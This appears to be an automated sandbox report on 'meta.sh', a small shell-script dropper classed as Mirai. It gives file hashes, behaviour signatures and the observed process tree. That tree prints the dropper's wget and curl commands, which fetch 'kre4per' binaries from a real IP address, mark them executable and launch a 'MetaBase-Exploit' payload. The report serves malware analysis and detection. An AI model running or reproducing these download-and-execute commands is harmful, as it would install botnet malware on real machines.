Analysis
-
max time kernel
6s -
max time network
9s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
17-02-2025 10:22
Static task
static1
Behavioral task
behavioral1
Sample
meta.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
meta.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
meta.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
meta.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
meta.sh
-
Size
483B
-
MD5
79b512b0b1a43d26890e67dfb400c8c8
-
SHA1
e8db4e2ce94cdcd5f97a02be52968a336b60d784
-
SHA256
c41d5810be4537b41400f5aefb61ace955fe7f1bfc26a2bb0cd6144f38aa3679
-
SHA512
fade5a3df3df6074e13c0a15f858e005b5ddb353729f050b74179def4dd653cee66fe53f22a484d70064ce38755d4e555fcbde9fa8a27ea70f5e1be1e5257904
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 677 chmod 688 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/kraapje 679 meta.sh /tmp/kraapje 689 meta.sh -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/filesystems cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/kre4per.x86 curl File opened for modification /tmp/kraapje meta.sh File opened for modification /tmp/kre4per.x86_64 wget File opened for modification /tmp/kre4per.x86_64 curl File opened for modification /tmp/busybox cp File opened for modification /tmp/kre4per.x86 wget
Processes
-
/tmp/meta.sh/tmp/meta.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:648 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:651
-
-
/usr/bin/wgetwget http://194.85.251.68/bins/kre4per.x862⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://194.85.251.68/bins/kre4per.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:666
-
-
/bin/catcat kre4per.x862⤵PID:676
-
-
/bin/chmodchmod +x busybox kraapje kre4per.x86 meta.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-Fan7j32⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/kraapje./kraapje MetaBase-Exploit2⤵PID:679
-
-
/usr/bin/wgetwget http://194.85.251.68/bins/kre4per.x86_642⤵
- Writes file to tmp directory
PID:682
-
-
/usr/bin/curlcurl -O http://194.85.251.68/bins/kre4per.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/catcat kre4per.x86_642⤵PID:687
-
-
/bin/chmodchmod +x busybox kraapje kre4per.x86 kre4per.x86_64 meta.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-Fan7j32⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/kraapje./kraapje MetaBase-Exploit2⤵PID:689
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555
-
Filesize
61KB
MD5d2b8f3324a01bcc7b32944d8d8b84f81
SHA1ad898c85a87d9e44d6a88d900b23d350b545e8af
SHA2566bc122342cb7620b9e130b71869bcedd664c243fb8a63bb2f29a9c71cb48fce4
SHA512b8fc9a6c4a713cda10db85e1283f840de8e2a04546a20993c214a9768b8aa98172e810c148f4bf8ed90286fe9cf7b091eabf512ab0bf3681bef759ce9fa894ad
-
Filesize
53KB
MD57ffbdf8a1d617b2c93d5fc520ccb31cc
SHA15dbe3ceeb1e58a61671b74d040b809d343d24b53
SHA2567c3b7d80a9f95b61e3a56a62493c5f3336eabd766a17d2d07e28d01ec750f7eb
SHA5123de46ad924e9ceab846f2a09933a1cb654e5e70c8a4bf84d395c8492470b8bcc0afc838b3f4ceb8086c81e4beba5c2884bd59a202d6c682ae58c6d2a28766727